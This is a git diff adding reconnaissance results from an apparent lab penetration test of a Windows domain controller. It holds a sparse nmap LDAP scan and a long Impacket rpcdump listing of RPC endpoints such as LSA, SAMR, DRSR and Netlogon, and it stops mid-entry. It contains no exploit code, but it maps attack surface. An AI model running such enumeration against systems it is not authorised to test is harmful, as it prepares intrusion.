a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml new file mode 100644 index 00000000..655d97ee --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml @@ -0,0 +1,42 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt 
@@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: 
N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + 
ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + 
ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + 
ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group 
Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw 
APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + 
ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + 
ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + 
ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + 
ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + 